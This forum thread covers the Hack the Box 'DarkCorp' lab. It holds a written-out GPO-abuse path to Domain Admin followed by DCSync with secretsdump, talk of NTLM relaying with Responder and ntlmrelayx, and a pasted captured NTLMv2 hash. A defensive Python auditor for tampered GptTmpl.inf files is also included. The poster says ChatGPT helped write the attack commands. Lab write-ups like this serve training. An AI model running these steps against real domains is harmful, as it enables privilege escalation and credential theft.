DarkCorp Hack the Box Season 7 (Windows Insane)
by RedBlock - Saturday February 8, 2025 at 03:32 PM
(Feb 10, 2025, 09:45 PM)4yhg5y72jffg820j3f Wrote: Here is my PrivEsc from taylor.b.adm to Domain Admin. I didn't know any of these horrific PowerShell GPO commands; ChatGPT helped a lot here. However, using those means there is no SharpGPOAbuse dependency and thus no need to circumvent Defender on the DC.

# Login as taylor.b.adm using evil-winrm.
$ evil-winrm -i 172.16.20.1 -u taylor.b.adm -p 'XXXXXXXXXX'

# Realize taylor.b.adm is gpo_manager
whoami /all

# Check which GPOs exist on DC-01:
Get-GPO -All

# Use the "SecurityUpdates" GPO (because the other ones didn't work)
$GpoName = "SecurityUpdates"

# Add taylor.b.adm to the "Administrators" group
$Group = "Administrators"
$User = "darkcorp\taylor.b.adm"

# Modify GPO to add user to "Administrators" group
Set-GPRegistryValue -Name $GpoName -Key "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -ValueName "LocalAccountTokenFilterPolicy" -Type DWord -Value 1

# Update Restricted Groups to ensure the user is added
$Gpo = Get-GPO -Name $GpoName
$GpoPath = "\\darkcorp.htb\sysvol\darkcorp.htb\Policies\{$($Gpo.Id)}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
Add-Content -Path $GpoPath -Value "[Group Membership]" -Force
Add-Content -Path $GpoPath -Value "$Group = $User"

# Force update
gpupdate /force

# DC-SYNC since now you're God:
$ impacket-secretsdump darkcorp.htb/taylor.b.adm@darkcorp.htb

# Use the hashes to harvest flags etc...

And about the user?
Reply
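A defender-side counterpart to the GPO edit in the post above, added here as an example (it is not code from the thread, from Microsoft or from any GPO tool): an offline audit of the Restricted Groups section of GptTmpl.inf that flags exactly the kind of appended [Group Membership] block the script writes. It assumes you supply the file bytes (for instance from a SYSVOL copy) and an allow-list of expected members per group; every SID and file body in it is constructed, and the `Finding` type and function names are mine.

```python
"""Offline audit of Restricted Groups entries in GPO GptTmpl.inf files.

In SYSVOL each GPO template sits at Policies/{GUID}/Machine/Microsoft/Windows NT/SecEdit/GptTmpl.inf
and is normally UTF-16LE with a BOM. Its [Group Membership] section holds keys of the form
<group>__Members or <principal>__Memberof, where group, principal and members are usually *SID
values. Anything else there deserves a look: an account with edit rights on the GPO can append lines.
Added example; not code from the thread, from Microsoft or from any GPO tool.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

ADMINISTRATORS_SID = "*s-1-5-32-544"  # BUILTIN\Administrators (everything is compared lower-cased)


@dataclass
class Finding:
    severity: str
    message: str


def decode_gpttmpl(data: bytes) -> tuple[str, list[Finding]]:
    """Decode the template, flagging 8-bit text glued onto a UTF-16 body."""
    findings: list[Finding] = []
    if data.startswith(b"\xff\xfe"):
        text = data[2:].decode("utf-16-le", errors="replace")
        # ASCII appended without re-encoding decodes to odd non-Latin code points.
        if len(data) % 2 or any(ord(c) > 0x24F for c in text):
            findings.append(Finding("high", "UTF-16 body followed by 8-bit text: naive append suspected"))
    else:
        text = data.decode("utf-8", errors="replace")
    return text, findings


def parse_sections(text: str) -> tuple[dict[str, list[tuple[str, str]]], list[Finding]]:
    """INI-style parse that tolerates, and reports, repeated section headers."""
    sections: dict[str, list[tuple[str, str]]] = {}
    counts: dict[str, int] = {}
    findings: list[Finding] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = header.group(1).strip().lower()
            counts[current] = counts.get(current, 0) + 1
            sections.setdefault(current, [])
            continue
        if current is None or "=" not in line:
            findings.append(Finding("medium", f"unparseable line: {line[:40]!r}"))
            continue
        key, _, value = line.partition("=")
        sections[current].append((key.strip(), value.strip()))
    for name, n in counts.items():
        if n > 1:
            findings.append(Finding("high", f"section [{name}] appears {n} times: appended content?"))
    return sections, findings


def audit_group_membership(sections: dict[str, list[tuple[str, str]]],
                           allowed: dict[str, set[str]]) -> list[Finding]:
    """Check every Restricted Groups entry against an allow-list of members per group."""
    findings: list[Finding] = []
    for key, value in sections.get("group membership", []):
        m = re.fullmatch(r"(.+?)__(members|memberof)", key, re.IGNORECASE)
        if not m:
            findings.append(Finding("high", f"non-standard Restricted Groups key {key!r} = {value!r}"))
            continue
        principal, relation = m.group(1).lower(), m.group(2).lower()
        listed = [v.strip().lower() for v in value.split(",") if v.strip()]
        # <group>__Members lists members of <group>; <principal>__Memberof lists the groups
        # <principal> is placed into. Normalise both into (group, member) pairs.
        pairs = [(principal, x) for x in listed] if relation == "members" else [(x, principal) for x in listed]
        for group, member in pairs:
            if not member.startswith("*"):
                findings.append(Finding("medium", f"{group}: member {member!r} given by name, not SID"))
            if member not in allowed.get(group, set()):
                findings.append(Finding("high", f"{group} gains unexpected member {member}"))
    return findings


def audit_gpttmpl(data: bytes, allowed: dict[str, set[str]]) -> list[Finding]:
    text, findings = decode_gpttmpl(data)
    sections, more = parse_sections(text)
    return findings + more + audit_group_membership(sections, allowed)


# Constructed sample: a clean template keeping Domain Admins (RID 512 of a made-up
# domain SID) in local Administrators, then the same file with a second
# [Group Membership] block appended, once in UTF-16 and once as plain ASCII.
CLEAN_INF = b"\xff\xfe" + (
    "[Unicode]\r\nUnicode=yes\r\n"
    '[Version]\r\nsignature="$CHICAGO$"\r\nRevision=1\r\n'
    "[Group Membership]\r\n"
    "*S-1-5-32-544__Memberof =\r\n"
    "*S-1-5-32-544__Members = *S-1-5-21-1000-2000-3000-512\r\n"
).encode("utf-16-le")
APPENDED_INF = CLEAN_INF + "[Group Membership]\r\nAdministrators = darkcorp\\taylor.b.adm\r\n".encode("utf-16-le")
APPENDED_8BIT_INF = CLEAN_INF + b"[Group Membership]\r\nAdministrators = darkcorp\\taylor.b.adm\r\n"
ALLOWED = {ADMINISTRATORS_SID: {"*s-1-5-21-1000-2000-3000-512"}}

if __name__ == "__main__":
    for label, blob in ("clean", CLEAN_INF), ("appended", APPENDED_INF), ("appended-8bit", APPENDED_8BIT_INF):
        print(f"== {label}")
        for f in audit_gpttmpl(blob, ALLOWED):
            print(f"   [{f.severity}] {f.message}")
```

To run it across a domain, glob `Policies/*/Machine/Microsoft/Windows NT/SecEdit/GptTmpl.inf` under a SYSVOL copy and feed each file's bytes to `audit_gpttmpl`. The file check is a point-in-time control; the edit itself also bumps the GPO's versionNumber on its groupPolicyContainer object, so with Directory Service Changes auditing enabled the same change shows up as event 5136 on the DC at the moment it happens, and SYSVOL write monitoring catches the file append.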
(Feb 10, 2025, 10:39 PM)hint80h Wrote:
(Feb 10, 2025, 09:45 PM)4yhg5y72jffg820j3f Wrote: [GPO privesc post, quoted in full above]

And about the user?

User is on 172.16.18.2. Get svc_acc's NTLM hash with Responder, log in and escalate your privileges to Administrator.
Reply
(Feb 10, 2025, 10:55 PM)samuelballsiu1 Wrote:
(Feb 10, 2025, 10:39 PM)hint80h Wrote:
(Feb 10, 2025, 09:45 PM)4yhg5y72jffg820j3f Wrote: [GPO privesc post, quoted in full above]

And about the user?

User is on 172.16.18.2. Get svc_acc's NTLM hash with Responder, log in and escalate your privileges to Administrator.

Man, how did you get the svc_acc hash? I set my Responder to ligolo, the hash never came although I got LDAP and SMB shells from 172.16.20.1

Reply
(Feb 10, 2025, 10:55 PM)samuelballsiu1 Wrote:
(Feb 10, 2025, 10:39 PM)hint80h Wrote:
(Feb 10, 2025, 09:45 PM)4yhg5y72jffg820j3f Wrote: [GPO privesc post, quoted in full above]

And about the user?

User is on 172.16.18.2. Get svc_acc's NTLM hash with Responder, log in and escalate your privileges to Administrator.

I've been trying that for a bit, but I can only do something with it using ntlmrelayx. I've put Responder on all interfaces and nothing... fatigue must be getting to me.
Reply
(Feb 10, 2025, 11:13 PM)arrogantoverlord Wrote:
(Feb 10, 2025, 10:55 PM)samuelballsiu1 Wrote:
(Feb 10, 2025, 10:39 PM)hint80h Wrote:
(Feb 10, 2025, 09:45 PM)4yhg5y72jffg820j3f Wrote: [GPO privesc post, quoted in full above]

And about the user?

User is on 172.16.18.2. Get svc_acc's NTLM hash with Responder, log in and escalate your privileges to Administrator.

I've been trying that for a bit, but I can only do something with it using ntlmrelayx. I've put Responder on all interfaces and nothing... fatigue must be getting to me.

Same, I just want to know whether it's my ntlmrelayx command, Responder or ligolo that is missing something; I just can't get the hash, although I am getting the shells with `--interactive`. Must be fatigue, I think, too.

Reply
(Feb 10, 2025, 10:39 PM)hint80h Wrote:
(Feb 10, 2025, 09:45 PM)4yhg5y72jffg820j3f Wrote: [GPO privesc post, quoted in full above]

And about the user?

After the DC sync you can get the hash for Administrator and use it to log in on both .1 and .2 and fetch both flags.
Reply
I didn't say that I got the NTLM hash, I'm also struggling with this part. I just told the way to get the user.
Reply
(Feb 10, 2025, 10:55 PM)samuelballsiu1 Wrote:
(Feb 10, 2025, 10:39 PM)hint80h Wrote:
(Feb 10, 2025, 09:45 PM)4yhg5y72jffg820j3f Wrote: [GPO privesc post, quoted in full above]

And about the user?

User is on 172.16.18.2. Get svc_acc's NTLM hash with Responder, log in and escalate your privileges to Administrator.

Have you done that? Or you're just repeating what you have been told?

Btw, someone gave me this info: ADCS and web enrollment to root web01. He mentioned relaying Kerberos over SMB using krbrelayx. I'm still looking at how to apply this info. Maybe we need to exploit the CertEnroll share? Idk
Reply
I hate people posting rabbit holes. Honestly, each time we have either people just submitting the flag so we say "Oh wow, he is so strong" or people purposely giving rabbit holes.... Respect to people sharing solutions so we spread knowledge!

DARKCORP\svc_acc is not an admin of 172.16.20.2, so we will not be able to get a shell with it. Maybe it is a local admin only?

I don't think Responder is the way; even if we get hashes, they won't crack (because if they did, the NTLM hash of svc_acc that someone posted would crack). But I agree it is weird we cannot make Responder work.

I think the way is Relay --> shell --> privesc --> user.txt on 172.16.20.2

Reply
Btw, these are the NTLMv2 hashes, but they wouldn't help I guess.


[!] Error starting SSL server on port 443, check permissions or other servers running.
[HTTP] NTLMv2 Client  : XX.XX.XX,XX
[HTTP] NTLMv2 Username : darkcorp\svc_acc
[HTTP] NTLMv2 Hash    : svc_acc::darkcorp:2bd40dfbc...
[SMB] NTLMv2-SSP Client  : XX.XX.XX.XX
[SMB] NTLMv2-SSP Username : darkcorp\WEB-01$
[SMB] NTLMv2-SSP Hash    : WEB-01$::darkcorp:a651ec56f939237d:E237AD013E38577025DFD70EA2D43B61:0101000000000000006E5163157CDB019BB182F2D7DA712800000000020008004F0057005200450001001E00570049004E002D00590030004E005400360031003200310030004B00350004003400570049004E002D00590030004E005400360031003200310030004B0035002E004F005700520045002E004C004F00430041004C00030014004F005700520045002E004C004F00430041004C00050014004F005700520045002E004C004F00430041004C0007000800006E5163157CDB01060004000200000008003000300000000000000000000000004000002F4341C14AC6BEB56BFAB7C3964CCA766E891A0A3D9A25D606DF71581B00F8770A001000000000000000000000000000000000000900300063006900660073002F007700650062002D00300032002E006400610072006B0063006F00720070002E006800740062000000000000000000
[*]Skipping previously captured hash for darkcorp\WEB-01$
Reply

